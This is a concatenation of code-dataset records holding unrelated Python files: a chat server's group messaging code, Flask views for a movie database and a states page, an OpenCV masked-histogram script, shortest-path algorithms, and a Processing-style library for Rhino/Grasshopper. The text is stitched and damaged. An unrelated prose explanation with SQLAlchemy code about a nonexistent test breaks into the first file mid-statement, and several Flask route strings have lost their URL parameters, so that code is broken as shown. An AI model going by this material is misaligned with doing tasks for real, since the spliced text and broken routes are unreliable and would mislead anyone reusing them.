extract_grpup(grupos,nome):\r\n for grupo in grupos:\r\n a,b = grupo\r\n if a == nome:\r\n return b\r\n\r\ndef privateMessaging(group_name:str,message:str,clients:list[client],client_sender:client,sig:str) -> None:\r\n try:\r\n username_of_the_users = extract_grpup(grupos,group_name)\r\n #print(username_of_the_users)\r\n other_clients = 
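The `test_mutable_json_type` test above checks that in-place edits to a JSON column mark the row dirty. The project's models aren't included here, but the standard SQLAlchemy recipe such a column is usually built on looks like this (names are illustrative, not the project's actual code):

import json
from sqlalchemy import Column, Integer
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.ext.mutable import MutableDict
from sqlalchemy.types import TypeDecorator, Text

Base = declarative_base()

class JSONEncodedDict(TypeDecorator):
    # Persist a Python dict as a JSON string
    impl = Text

    def process_bind_param(self, value, dialect):
        return json.dumps(value) if value is not None else None

    def process_result_value(self, value, dialect):
        return json.loads(value) if value is not None else None

class SyncStatus(Base):
    __tablename__ = 'sync_status'
    id = Column(Integer, primary_key=True)
    # MutableDict emits change events on item assignment, so code like
    # update_metrics() above does not need to reassign the whole dict.
    metrics = Column(MutableDict.as_mutable(JSONEncodedDict))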
list(filter(lambda x: x.name in username_of_the_users,clients))\r\n print(\"BIGBIG\")\r\n message = message + \".|||.\" + sig + \".|||.\" + client_sender.sign_mesages[1]\r\n #print(message)\r\n message = f\"privateMSG{group_name}.|||.{message}.|||.{client_sender.name}\"\r\n for cliente in other_clients:\r\n if cliente.name != client_sender.name:\r\n #print(f\"VALOR DA MSG: {message}\")\r\n cliente.send_message(message.encode('utf-8'))\r\n\r\n except Exception as e:\r\n print(e.args)\r\n\r\ndef talk(message:str,client_sender:client,clients:list[client]) -> None:\r\n group_name, message,sig = message.split(\".__.\")\r\n\r\n privateMessaging(group_name,message,clients,client_sender,sig)","repo_name":"arctumn/Apolircs_PY","sub_path":"src/Server/private_message.py","file_name":"private_message.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"468672388","text":"\nfrom application import app, db\nfrom flask_login import login_required, current_user\n\nfrom flask import redirect, render_template, request, url_for\nfrom application.movies.models import Movie\nfrom application.movies.forms import MovieForm\nfrom application.ratings.models import Rating\nfrom application.roles.models import Role\nfrom application.persons.models import Person\nfrom application.persons_role_in_movie.forms import PersonsRoleInThisMovieForm\nfrom application.persons_role_in_movie.models import PersonsRoleInMovie\n\n\n\n@app.route(\"/movies\", methods=[\"GET\"])\ndef movies_index():\n return render_template(\"movies/list.html\", movies = Movie.query.all())\n\n@app.route(\"/movies//\", methods=[\"GET\"])\ndef movies_get_movie(movie_id):\n m = Movie.query.get(movie_id)\n r = Rating.find_movie_avg(movie_id)\n r_count = Rating.get_count_of_ratings_in_movie(movie_id)\n credits = PersonsRoleInMovie.get_credits(movie_id) \n if r == None:\n return render_template(\"movies/movie.html\",movie = m, form = MovieForm(), rating=r, rating_count = r_count, credits = credits)\n else:\n r = round(r,2)\n return render_template(\"movies/movie.html\",movie = m, form = MovieForm(), rating=r, rating_count = r_count, credits = credits)\n\n\n \n\n@app.route(\"/movies/new/\")\n@login_required\ndef movies_form():\n form = MovieForm(request.form)\n return render_template(\"movies/new.html\", form = MovieForm())\n\n\n@app.route(\"/movies/\", methods=[\"POST\"])\n@login_required\ndef movies_create():\n form = MovieForm(request.form)\n if not form.validate():\n return render_template(\"movies/new.html\", form = form)\n\n n = form.name.data\n d = form.duration.data\n b = form.budget.data\n y = form.year.data\n m = Movie(n, d, b,y)\n m.account_id = current_user.id\n db.session().add(m)\n db.session().commit()\n return redirect(url_for(\"movies_index\"))\n\n\n@app.route(\"/movies//add_credits/\", methods=[\"GET\"])\ndef movie_add_credits_index(movie_id):\n form = PersonsRoleInThisMovieForm(request.form)\n movie = Movie.query.get(movie_id)\n return render_template(\"movies/movieaddcredits.html\", movie = movie, roles = Role.query.all(), persons = Person.query.all(), form = form)\n\n@app.route(\"/movies//add_credits/\", methods=[\"POST\"])\ndef movie_add_credits(movie_id):\n form = PersonsRoleInThisMovieForm(request.form)\n role = form.roles.data\n person = form.persons.data\n movie = Movie.query.get(movie_id)\n s = PersonsRoleInMovie(movie=movie,role=role, person=person)\n db.session.add(s)\n db.session.commit()\n return 
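`PersonsRoleInMovie` is constructed above with movie=, role= and person= keywords, the classic association-object pattern, but its model lives in another module. A plausible minimal Flask-SQLAlchemy shape, inferred from those call sites (illustrative only, not the repository's actual definition):

from application import db

class PersonsRoleInMovie(db.Model):
    id = db.Column(db.Integer, primary_key=True)
    movie_id = db.Column(db.Integer, db.ForeignKey('movie.id'))
    role_id = db.Column(db.Integer, db.ForeignKey('role.id'))
    person_id = db.Column(db.Integer, db.ForeignKey('person.id'))

    # One relationship per keyword used in PersonsRoleInMovie(movie=..., role=..., person=...)
    movie = db.relationship('Movie', backref='credits')
    role = db.relationship('Role')
    person = db.relationship('Person')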
redirect(url_for(\"movie_add_credits_index\", movie_id = movie_id))\n\n@app.route(\"/movies//update/\", methods=[\"GET\"])\ndef movie_update_index(movie_id):\n    m = Movie.query.get(movie_id)\n    form = MovieForm(request.form)\n    form.name.data = m.name\n    form.budget.data = m.budget\n    form.duration.data = m.duration\n    form.year.data = m.year\n    return render_template(\"movies/edit.html\", movie = m, form = form)\n\n\n@app.route(\"/movies//update/\", methods=[\"POST\"])\ndef movie_update(movie_id):\n    m = Movie.query.get(movie_id)\n    form = MovieForm(request.form)\n    m.name = form.name.data\n    m.budget = form.budget.data\n    m.year = form.year.data\n    m.duration = form.duration.data\n    db.session().commit()\n    return redirect(url_for(\"movies_get_movie\", movie_id = m.id))\n\n@app.route(\"/movies//delete/\", methods=[\"POST\"])\ndef movie_delete(movie_id):\n    m = Movie.query.get(movie_id)\n    Rating.query.filter(Rating.movie_id == movie_id).delete()\n    db.session().delete(m)\n    db.session().commit()\n    return redirect(url_for(\"movies_index\"))\n\n@app.route(\"/movies//delete_credit/\", methods=[\"POST\"])\ndef movie_delete_credit(movie_id, credit_id):\n    c = PersonsRoleInMovie.query.get(credit_id)\n    db.session().delete(c)\n    db.session().commit()\n    return redirect(url_for(\"movies_get_movie\", movie_id = movie_id))","repo_name":"veliblesku/elokuvatietokanta","sub_path":"application/movies/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3968,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"69955523735","text":"from matplotlib import pyplot as plt\nimport numpy as np\nimport argparse\nimport cv2\n\ndef plot_histogram(image, title, mask = None):\n    channels = cv2.split(image)\n    colors = ('b','g','r')\n    plt.figure()\n    plt.title(title)\n    plt.xlabel(\"Bins\")\n    plt.ylabel(\"Pixels\")\n\n    for (channel, color) in zip(channels, colors):\n        hist = cv2.calcHist([channel],[0], mask, [256], [0,256])\n        plt.plot(hist,color = color)\n        plt.xlim([0,256])\n\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--image\", required = True, help = \"image path\")\nargs = vars(ap.parse_args())\n\nimage = cv2.imread(args['image'])\ncv2.imshow('DREAM', image)\nplot_histogram(image, \"Histogram for DREAM\")\n\nmask = np.zeros(image.shape[:2], dtype = \"uint8\")\ncv2.rectangle(mask,(92,95),(315,325),255,-1)\ncv2.imshow(\"THAT'S WHAT THE POINT OF THE MASK IS\", mask)\n\nmasked = cv2.bitwise_and(image,image,mask = mask)\ncv2.imshow(\"no one cared who i was until i put on the mask\", masked)\n\nplot_histogram(image, \"Histogram for Masked Image\", mask = mask)\nplt.show()\ncv2.waitKey(0)\n","repo_name":"Joekstr/OpenCVPractice","sub_path":"ch7/histogram_with_mask.py","file_name":"histogram_with_mask.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"4030119271","text":"import heapq\n\n# Finds the shortest path from a single node A to all other nodes in the graph\n# Dijkstra's algorithm does not support negative edge weights, because an already-finalized distance could be invalidated by a later negative edge\n# O(E + V log V)\ndef dijkstra(graph, initial_node):\n    distances = { node: float('inf') for node in graph } # Map of best known distances\n    distances[initial_node] = 0\n    to_visit = [ (0, initial_node) ]\n\n    while to_visit:\n        c_distance, node = heapq.heappop(to_visit)\n\n        if c_distance > distances[node]: continue\n\n        for neighbor, weight in graph[node].items():\n            distance = c_distance + weight\n            if distance < distances[neighbor]:\n                distances[neighbor] = distance\n                heapq.heappush(to_visit, (distance, neighbor))\n\n    return distances\n\n
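As a quick check of the adjacency-dict format shared by all three functions in this file (`{node: {neighbor: weight}}`), here is a toy graph; the same dict also works for `bellman_ford` and `floyd_warshall` defined just below:

toy_graph = {
    0: {1: 4, 2: 1},
    1: {3: 1},
    2: {1: 2, 3: 5},
    3: {},
}
print(dijkstra(toy_graph, 0))  # {0: 0, 1: 3, 2: 1, 3: 4}, cheapest route to 3 is 0 -> 2 -> 1 -> 3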
# Finds the shortest path from a single node to all nodes in the graph\n# The algorithm runs V - 1 rounds of edge relaxation; if one extra round still reduces a distance, the graph contains a negative cycle\n# O( V * E )\ndef bellman_ford(graph, initial_node):\n    distances = { node: float('inf') for node in graph }\n    distances[initial_node] = 0\n\n    for _ in range(len(graph) - 1):\n        for node in graph:\n            for neighbor, weight in graph[node].items():\n                if distances[node] + weight < distances[neighbor]:\n                    distances[neighbor] = distances[node] + weight\n\n    # checking negative cycles\n    for node in graph:\n        for neighbor, weight in graph[node].items():\n            if distances[node] + weight < distances[neighbor]:\n                return -1 # There is a negative cycle\n    return distances\n\n# Finds shortest path between ALL node pairs of the graph\n# Handles negative weights, but the result is undefined when the graph contains a negative weight cycle\n# O ( V^3 )\ndef floyd_warshall(graph):\n    n = len(graph)\n    distances = [[float('inf')] * n for _ in range(n)]\n\n    for i in range(n): distances[i][i] = 0\n\n    for node, neighbors in graph.items():\n        for neighbor, weight in neighbors.items():\n            distances[node][neighbor] = weight\n\n    for k in range(n):\n        for i in range(n):\n            for j in range(n):\n                distances[i][j] = min(distances[i][j], distances[i][k] + distances[k][j])\n\n    return distances\n","repo_name":"FedeLochbaum/google-cloud-interview","sub_path":"data-structures-and-algorithms/graph/shortest_path.py","file_name":"shortest_path.py","file_ext":"py","file_size_in_byte":2184,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"38260581856","text":"#!/usr/bin/python3\n\"\"\"states template\n\"\"\"\n\nfrom flask import Flask, render_template\nfrom models import storage\n\napp = Flask(__name__)\n\n\n@app.teardown_appcontext\ndef current_remove(self):\n    \"\"\"After each request, close the current SQLAlchemy session\n    \"\"\"\n    storage.close()\n\n\n# host:5000/(id)\n@app.route('/states/', strict_slashes=False)\n@app.route('/states/', strict_slashes=False)\ndef display_html(id=None):\n    \"\"\"display states by Id\n    \"\"\"\n    data = storage.all(\"State\")\n    return render_template('9-states.html', states=data, id=id)\n\n\nif __name__ == \"__main__\":\n    app.run(host='0.0.0.0', port=5000, debug=True)\n","repo_name":"MiguelP4lacios/AirBnB_clone_v2","sub_path":"web_flask/9-states.py","file_name":"9-states.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"14027200437","text":"import scriptcontext as sc\nimport Rhino\nimport rhinoscriptsyntax as rs\nfrom Rhino.Geometry import * #?\nimport Grasshopper.Kernel.Data.GH_Path as Path\nimport Grasshopper.DataTree as DataTree\nimport time\nimport math\nfrom math import * #!\nPI = math.pi\nconstrain = Rhino.RhinoMath.Clamp\nimport System.Drawing.Color as Color\nimport System.Drawing.Rectangle\nimport pgh.perlin\nfrom random import seed as randomSeed\nfrom random import gauss as randomGaussian\nfrom random import shuffle, choice\nfrom random import uniform\nfrom pgh.interact import *\nSimplex = pgh.perlin.SimplexNoise()\nimport inspect\ndef random(a = 1,b = 0):\n    \"random(a,b)->[a,b], random(a)->[0,a], random()->[0,1]\"\n    return uniform(a,b)\ndef noise(*args):\n    \"Simplex noise 
1,2,3d\"\n if len(args) == 1:\n return Simplex.noise2(args[0],0)\n elif len(args) == 2:\n return Simplex.noise2(*args)\n else:\n return Simplex.noise3(*args)\ndef noiseDetial():\n raise NotImplemented\n\nPFLAG = None\n# accessible global var\nwidth = 640\nheight = 800\nP2D = Rhino.Display.DefinedViewportProjection.Top\nP3D = Rhino.Display.DefinedViewportProjection.Perspective\n## global setting\nif \"DISPLAY\" not in sc.sticky:\n sc.sticky[\"DISPLAY\"] = Rhino.Display.CustomDisplay(True)\nDISPLAY = sc.sticky[\"DISPLAY\"]\n_ghenv = None\nall_processing = {}\n## display setting\nclass Style:\n def __init__(self):\n self.IS_FILL = True\n self.FILL_COLOR = Color.FromArgb(255,255,255)\n self.IS_STROKE = True\n self.STROKE_COLOR = Color.FromArgb(1,0,0,0)\n self.STROKE_WEIGHT = 1\nclass Info:\n def __init__(self):\n self.IS_LOOP = True\n self.LOOP_COUNT = 0\n self.TIME = 0\n### dummy placeholder only for import\nSTYLE = Style()\nSTYLESTACK = []\n_SHAPESTACK = []\n_CPLANESTACK = []\nCPLANE = Plane.WorldXY\nAUTO_DISPLAY = True\nGEOMETRY_OUTPUT = True\nCOLOR_OUTPUT = False\nGeoOut = DataTree[object]()\nColorOut = DataTree[Color]()\nINFO = Info()\nVIEWPORT = Rhino.RhinoDoc.ActiveDoc.Views.ActiveView.ActiveViewport\n## general setting that persist over different instacnes\nTORLERENCE = Rhino.RhinoDoc.ActiveDoc.PageAbsoluteTolerance\nthisDoc = Rhino.RhinoDoc.ActiveDoc\n# mouse variable that all instances share(not actually shared, but should be diffcult to notice)\n_posInfo = rs.GetCursorPos()\nmouseX = _posInfo[0].X\nmouseY = _posInfo[0].Y\npmouseX = mouseX\npmouseY = mouseY\nmousePressed = False\n_pmousePressed = False\nmouseMoved = False\nmouseDragged = False\nmouseClicked = False\ndef update_mouse():\n global mouseX,screenX,mouseY,screenY,pmouseX,pmouseY,\\\n _pmousePressed,mousePressed,mouseMoved,mouseDragged,mouseClicked\n pmouseX = mouseX\n pmouseY = mouseY\n _pmousePressed = mousePressed\n _posInfo = rs.GetCursorPos()\n screenX = _posInfo[1].X\n screenY = _posInfo[1].Y\n client = thisDoc.Views.ActiveView.ActiveViewport.ClientToWorld(_posInfo[3])\n tup = Intersect.Intersection.LinePlane(client,CPLANE)\n if tup[0]:\n ptOnPlane = client.PointAt(tup[1])\n mouseX = ptOnPlane.X\n mouseY = ptOnPlane.Y\n else:\n mouseX = _posInfo[0].X\n mouseY = _posInfo[0].Y\n #? 
returned mouseX,Y is based on world coord but ellipse,rect...function is based on CPLANE so\n mouseX -= CPLANE.OriginX\n mouseY -= CPLANE.OriginY\n mousePressed = isMousePressed()\n mouseMoved = pmouseX != mouseX or pmouseY != mouseY\n mouseDragged = mouseMoved and mousePressed\n mouseClicked = _pmousePressed and not mousePressed\n\n\"\"\"\n#useless now\ndef _clear():\n for uniquevar in [var for var in globals().copy() if var[0] != \"_\"]:\n del globals()[uniquevar]\ndef _time_test(fn,arg,time = 1000):\n before = time.clock()\n for i in range(time):\n fn(*arg)\n after = time.clock()\n ms = (after - before)*1000\n print(\"cost %i ms for %i times\"%(ms,count))\n return ms\n\"\"\"\n## helper\ndef convert_polyline(curve):\n \" return a polyline, if convert fail, raise IndexOutOfBound \"\n if isinstance(curve,Polyline):\n return curve\n else:\n nc = curve.ToNurbsCurve()\n return toPolyline(nc).TryGetPolyline()[1]\ndef toPolyline(curve,maxAngleRadians = 0.1, tolerance = 0.1):\n \" simplify ToPolyline buildin \"\n return curve.ToPolyline(0,0,maxAngleRadians,0,0, tolerance,0.01,0,True)\n\n## basic processing function ##\ndef NewView(name,Projection,screenX = 0,screenY = 0,seperate = True):\n \"create a new rhino viewport\"\n exist = Rhino.RhinoDoc.ActiveDoc.Views.Find(name,True)\n if not exist:\n exist = Rhino.RhinoDoc.ActiveDoc.Views.Add(\n name,\n Projection,\n System.Drawing.Rectangle(screenX,screenY,screenX+width,screenY+height),\n seperate)\n viewRect = Rectangle3d(CPLANE,width,height)\n exist.ActiveViewport.ZoomBoundingBox(viewRect.BoundingBox)\n return exist\ndef background(*args):\n \" clear OUTPUT, if has args, set backgound color(a,r,g,b) \"\n if len(args):\n c = color(*args)\n Rhino.ApplicationSettings.AppearanceSettings.ViewportBackgroundColor = c\n _clearOutput()\ndef size(w,h,mode=P2D,name='processing'):\n \" set size of new viewport \"\n global width,height,VIEWPORT\n width = w\n height = h\n VIEWPORT = NewView(name,mode).ActiveViewport\n\ndef toggleColor(state = False):\n \"cancel color out mode\"\n global COLOR_OUTPUT\n COLOR_OUTPUT = state\ndef color(*args):\n \"accept : (gray), (gray,alphy), (r,g,b), (r,g,b,a)\\\n return : Color\"\n length = len(args)\n if length == 1:\n if isinstance(args[0],Color):\n return args[0]\n else:\n return Color.FromArgb(args[0],args[0],args[0])\n elif length == 2:\n return Color.FromArgb(args[1],args[0],args[0],args[0])\n elif length == 3:\n return Color.FromArgb(*args)\n elif length == 4:\n return Color.FromArgb(args[3],args[0],args[1],args[2])\ndef _clearOutput():\n #!! 
need find a way to dispose display for each\n DISPLAY.Clear()\n DISPLAY.Dispose\n GeoOut.Clear()\n ColorOut.Clear()\ndef Display(anyCurve):\n \" overall display \"\n if GEOMETRY_OUTPUT:\n # add diffrent fill and outline to different GeoOut bracnch\n is_fill = STYLE.FILL_COLOR.A > 0\n is_stroke = STYLE.STROKE_COLOR.A > 0\n i = GeoOut.BranchCount\n if is_stroke:\n GeoOut.Add(anyCurve,Path(i))\n ColorOut.Add(STYLE.STROKE_COLOR,Path(i))\n\n if is_fill:\n GeoOut.Add(_fill_geometry(anyCurve),Path(i))\n ColorOut.Add(STYLE.FILL_COLOR,Path(i))\n if COLOR_OUTPUT:\n _fill_color(anyCurve,STYLE.IS_FILL,STYLE.IS_STROKE)\ndef Fill(curve,colour=None,real = True,brep = False):\n \" rhino version fill \"\n if not colour:\n colour = STYLE.FILL_COLOR\n if real:\n _fill_geometry(curve,brep)\n else:\n _fill_color(curve)\ndef noFill():\n STYLE.FILL_COLOR = Color.FromArgb(0,0,0,0)\ndef fill(*args):\n if isinstance(args[0], Color):\n STYLE.FILL_COLOR = args[0]\n return\n STYLE.FILL_COLOR = color(*args)\ndef _fill_geometry(planar_curve,brep = False):\n if brep:\n planar_curve = planar_curve.ToNurbsCurve()\n return Brep.CreatePlanarBreps(planar_curve)\n else:\n pline = convert_polyline(planar_curve)\n if not pline.IsClosed:\n pline.Add(pline.First)\n return Mesh.CreateFromClosedPolyline(pline)\ndef _fill_color(curve,fill = True,stroke = True):\n pline = convert_polyline(curve)\n DISPLAY.AddPolygon(pline.ToArray(),STYLE.FILL_COLOR,STYLE.STROKE_COLOR,fill,False)\n if stroke:\n DISPLAY.AddCurve(pline.ToNurbsCurve(),STYLE.FILL_COLOR,STYLE.STROKE_WEIGHT)\n\ndef Stroke(curve,colour=None,weight=None):\n if not colour:\n colour=STYLE.STROKE_COLOR\n if not weight:\n weight=STYLE.STROKE_WEIGHT\n c = curve.ToNurbsCurve()\n DISPLAY.AddCurve(c,colour,weight)\ndef stroke(*args):\n if isinstance(args[0], Color):\n STYLE.STROKE_COLOR = args[0]\n return\n STYLE.STROKE_COLOR = color(*args)\ndef noStroke():\n STYLE.STROKE_COLOR = Color.FromArgb(0,0,0,0)\ndef strokeWeight(weight):\n STYLE.STROKE_WEIGHT = weight\ndef pushStyle():\n STYLESTACK.append(STYLE)\ndef popStyle():\n global STYLE\n if STYLESTACK:\n STYLE = STYLESTACK.pop()\n\n### create shape api ###\nclass Shape(Curve):\n def __init__():\n self.shape = super(self,Shape).__init__()\n self.plist = []\ndef createShape():\n return Shape()\ndef beginShape(kind = None):\n #! 
add filled polygon\n    _SHAPESTACK.append( (kind,[]) )\ndef vertex(x,y,z=0):\n    _SHAPESTACK[-1][1].append(Point3d(x,y,z))\ndef endShape():\n    shape = _SHAPESTACK.pop()\n    if shape[0]:\n        pass\n    pline = Polyline(shape[1])\n    if AUTO_DISPLAY:\n        Display(pline)\n    return pline\n\ndef world_to_cplane(pt):\n    \"just pt - CPLANE.Origin\"\n    return CPLANE.RemapToPlaneSpace(pt)[1]\n### matrix manipulation ###\ndef translate(*args):\n    \"translate CPLANE with (x,y,[z]) or Vector3d\"\n    if isinstance(args[0],Vector3d):\n        CPLANE.Translate(args[0])\n    else:\n        CPLANE.Translate(CPLANE.PointAt(*args)-CPLANE.Origin)\ndef rotate(rad,axis=None,center=None):\n    \"return True if success\"\n    cplane = CPLANE\n    if not axis:\n        axis = cplane.ZAxis\n    if not center:\n        center = cplane.Origin\n    return cplane.Rotate(rad,axis,center)\n\ndef pushMatrix():\n    _CPLANESTACK.append(Plane(CPLANE))\ndef popMatrix():\n    global CPLANE\n    if _CPLANESTACK:\n        CPLANE = _CPLANESTACK.pop()\ndef setMatrix(plane):\n    \"change CPLANE to plane\"\n    global CPLANE\n    CPLANE = plane\n### time related ###\ndef frameRate(fps):\n    ms = 1000/fps\n    print(\"Set Timer Interval to : %i ms\" % (ms))\n    return ms\ndef millis():\n    return int((time.clock() - INFO.TIME)*1000)\n\n# math buildin\ndef dist(pt1,pt2):\n    return pt1.DistanceTo(pt2)\ndef map(value,a,b,c,d):\n    \"return remap value from (a,b) --> (c,d)\"\n    return (value-a)*(d-c)/(b-a) + c\nclass PVector(object):\n    \" processing PVector interface as Vector3d \"\n    def __init__(self,*args):\n        relative = Vector3d(CPLANE.Origin)\n        if len(args) == 0:\n            self.__data = Vector3d.Zero-relative\n        if len(args) == 1:\n            self.__data = args[0]\n        elif len(args) == 2:\n            self.__data = Vector3d(args[0],args[1],0)-relative\n        elif len(args) == 3:\n            self.__data = Vector3d(*args)-relative\n    def __repr__(self):\n        return 'PVector'+repr(self.__data)\n    def __str__(self):\n        return str(self.__data)\n    def __getattr__(self,attr):\n        return getattr(self.__data,attr)\n    def __radd__(self,other_v):\n        return PVector(self.__data + other_v)\n    def __add__(self,other):\n        if isinstance(other,Vector3d):\n            return PVector(self.__data + other)\n        return PVector(self.__data + other.__data)\n    def __sub__(self,other):\n        if isinstance(other,Vector3d):\n            return PVector(self.__data - other)\n        return PVector(self.__data - other.__data)\n    def __rsub__(self,other_v):\n        return PVector(other_v - self.__data)\n    def __div__(self,scalar):\n        return PVector(self.__data / scalar)\n    def __mul__(self,scalar):\n        return PVector(self.__data * scalar)\n    def __neg__(self):\n        return PVector(-self.__data)\n    def __cmp__(self, other):\n        return self.__data.CompareTo(other.__data)\n    def toVector(self):\n        return self.__data\n    def toPoint(self):\n        return Point3d(self.__data)\n    def get(self):\n        return self.__data\n    def set(self,v):\n        self.__data = v\n    def mag(self):\n        return self.Length\n    def add(self,v):\n        return self + v\n    def sub(self,v):\n        return self-v\n    def mult(self,s):\n        return self*s\n    def div(self,s):\n        return self/s\n    def dot(self,v):\n        return self*v\n    def cross(self,v):\n        return Vector3d.CrossProduct(self,v)\n    def normalize(self):\n        return self.Unitize()\n    def rotate(self,radians):\n        self.Rotate(radians,CPLANE.ZAxis)\n    def limit(self,s):\n        # cap the magnitude at s; rebinding the local name `self` would have no effect\n        if self.__data.Length > s:\n            self.__data.Unitize()\n            self.__data *= s\n    @property\n    def x(self):\n        return self.X\n    @property\n    def y(self):\n        return self.Y\n    @property\n    def z(self):\n        return self.Z\n    @classmethod\n    def angleBetween(cls,a,b):\n        return Vector3d.VectorAngle(a,b,CPLANE)\n    @classmethod\n    def random2D(cls):\n        theta = uniform(0,2*PI)\n        return 
Vector3d(math.cos(theta),math.sin(theta),0)\n @classmethod\n def random3D(cls):\n z = uniform(-1,1)\n theta = uniform(0,2*PI)\n v = PVector.random2D() * (1-z*z)**0.5\n return Vector3d(v.X,v.Y,z)\n##! TODO:image function\ndef loadImage(fpath):\n \"load image\"\n return Rhino.Display.DisplayBitmap.Load(fpath)\ndef image(img,x,y):\n \"position image\"\n pass\n\n# basic geometry drawing\ndef arc(x,y,w,h,start,stop,mode='PIE'):\n \" construct a elliptic arc \"\n if w == h:\n res = Arc(Circle(CPLANE,w),Interval(start,stop))\n spt = res.StartPoint\n ept = res.EndPoint\n cpt = CPLANE.Origin\n else:\n a = w/2\n b = h/2\n pl = Plane(CPLANE)\n pl.Translate(Vector3d(x,y,0))\n cpt = pl.Origin\n spt = pl.PointAt( a*math.cos(start),b*math.sin(start),0 )\n ept = pl.PointAt( a*math.cos(stop),b*math.sin(stop),0 )\n ellip = Ellipse(pl,a,b).ToNurbsCurve()\n t0 = ellip.ClosestPoint(spt)[1]\n t1 = ellip.ClosestPoint(ept)[1]\n res = ellip.Trim(t0,t1)\n if mode == \"PIE\":\n c1 = LineCurve(ept,cpt)\n c2 = LineCurve(cpt,spt)\n res = Curve.JoinCurves([res,c1,c2])[0]\n Display(res)\ndef line(x1,y1,x2,y2,z1=0,z2=0):\n \" simple line \"\n pl = Plane(CPLANE)\n ln = Line(pl.PointAt(x1,y1,z1),pl.PointAt(x2,y2,z2))\n if AUTO_DISPLAY:\n Display(ln)\n return ln\ndef list_to_point(lst,n=3):\n return [Point3d(*lst[i:i+n]) for i in range(0,len(lst),n)]\ndef curve(*args):\n \"construct 3-degree InterpolatedCurve from (x1,y1,z1,...,xn,yn,zn,)\\\n or (PT1,PT2,PT3)\"\n ##! not on CPLANE yet\n if not isinstance(args[0],Point3d):\n assert len(args)%3 == 0, \"argruments number not match\"\n pts = list_to_point(args)\n rpts = [CPLANE.RemapToPlaneSpace(p)[1] for p in pts]\n\n crv = Curve.CreateInterpolatedCurve(rpts,3)\n if AUTO_DISPLAY:\n Display(crv)\n return crv\ndef rect(x1,y1,x2,y2):\n rec = Rectangle3d(CPLANE,Point3d(x1,y1,0),Point3d(x2,y2,0))\n if AUTO_DISPLAY:\n Display(rec)\n return rec\ndef ellipse(x,y,a,b):\n pl = Plane(CPLANE)\n pl.Translate(Vector3d(x,y,0))\n ell = Ellipse(pl,a,b)\n if AUTO_DISPLAY:\n Display(ell)\n return ell\ndef polygon(x,y,r,n=5):\n \" draw polygon like the component \"\n c = Circle(CPLANE.PointAt(x,y,0),r)\n pts = [c.PointAt(i*2*PI/n) for i in range(n+1)]\n pline = Polyline(pts)\n if AUTO_DISPLAY:\n Display(pline)\n return pline\ndef text(content,x,y,z=0,height=None):\n \" add text to screen \"\n te = TextEntity()\n te.Text = content\n te.Plane = CPLANE\n if height:\n te.TextHeight = height\n te.Translate(Vector3d(CPLANE.PointAt(x,y,z)))\n txtcrvs = Curve.JoinCurves(te.Explode())\n if AUTO_DISPLAY:\n for crv in txtcrvs:\n Display(crv)\n return txtcrvs\n\n### help func?\ndef constrain_region( pt,geo):\n Max = geo.GetBoundingBox(CPLANE).Max\n Min = geo.GetBoundingBox(CPLANE).Min\n pt.X = Rhino.RhinoMath.Clamp(pt.X,Min.X,Max.X)\n pt.Y = Rhino.RhinoMath.Clamp(pt.Y,Min.Y,Max.Y)\n pt.Z = Rhino.RhinoMath.Clamp(pt.Z,Min.Z,Max.Z)\n return pt\n\n\n\"\"\"def _insureRightOutput(ghenv):\n # slove multiply instance problem\n global GeoOut,ColorOut\n GeoOut = ghenv.LocalScope.GeoOut = DataTree[object](ghenv.Component.Params.Output[1].VolatileData)\n ColorOut = ghenv.LocalScope.ColorOut = DataTree[object](ghenv.Component.Params.Output[2].VolatileData)\"\"\"\n# buildin func\ndef show_grid(switch = False):\n \" turn off cplane grid \"\n Rhino.RhinoDoc.ActiveDoc.Views.ActiveView.ActiveViewport.ConstructionGridVisible = switch\n Rhino.RhinoDoc.ActiveDoc.Views.ActiveView.ActiveViewport.ConstructionAxesVisible = switch\ndef get_class(ghenv):\n param = ghenv.Component.Params.Input[1]\n for data in 
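`PVector.random3D` above uses the Archimedes (cylinder-to-sphere) construction: a uniform z in [-1, 1] plus a uniform angle is exactly uniform on the sphere, because the sqrt(1 - z^2) radius compensates for the circles shrinking toward the poles. A plain-Python check of the same idea, independent of RhinoCommon:

import math, random

def random_unit_vector3():
    # z uniform in [-1, 1], angle uniform in [0, 2*pi): uniform over the unit sphere
    z = random.uniform(-1.0, 1.0)
    theta = random.uniform(0.0, 2.0 * math.pi)
    r = math.sqrt(1.0 - z * z)
    return (r * math.cos(theta), r * math.sin(theta), z)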
param.VolatileData.AllData(True):\n cls = data.Value\n ghenv.Script.SetVariable(cls.__name__, cls)\ndef unIntellisense(ghenv):\n for k,v in globals().items():\n ghenv.Script.SetIntellisenseVariable(k,v)\ndef get_params(_ghenv):\n global_dict = globals()\n for param in _ghenv.Component.Params:\n name = param.NickName\n global_dict.update({name:_ghenv.Script.GetVariable(name)})\ndef glob():\n return globals()\ndef recive_from_gh(_ghenv):\n ## get ALL var overwrite this\n get_params(_ghenv)\n source = _ghenv.Component.Code.split(\"custom code below\")[1].split(\"custom code above\")[0].replace('\\r','')\n exec(source)\n globals().update(locals())\n \"\"\"\n global_dict = globals()\n for name in _ghenv.Script.GetVariableNames():\n global_dict.update({name:_ghenv.Script.GetVariable(name)})\"\"\"\ndef noLoop():\n INFO.IS_LOOP = False\ndef setup():\n \"run once when RESET == True\"\n noLoop()\ndef draw():\n \"continuous run when RESET == False\"\n noLoop()\ndef GO(ghenv):\n global _ghenv\n switch = ghenv != _ghenv\n _ghenv = ghenv\n if ghenv not in all_processing:\n this_p = Processing(ghenv)\n all_processing[ghenv] = this_p\n else:\n this_p = all_processing[ghenv]\n if switch:\n this_p.switch()\n param = ghenv.Component.Params.Input[0]\n RESET = True\n for data in param.VolatileData.AllData(True):\n RESET = data.Value\n if RESET:\n this_p.initialize()# restore the global var to this process\n setup()#run setup\n elif INFO.IS_LOOP:\n INFO.LOOP_COUNT += 1\n update_mouse()\n get_params(ghenv)\n #print 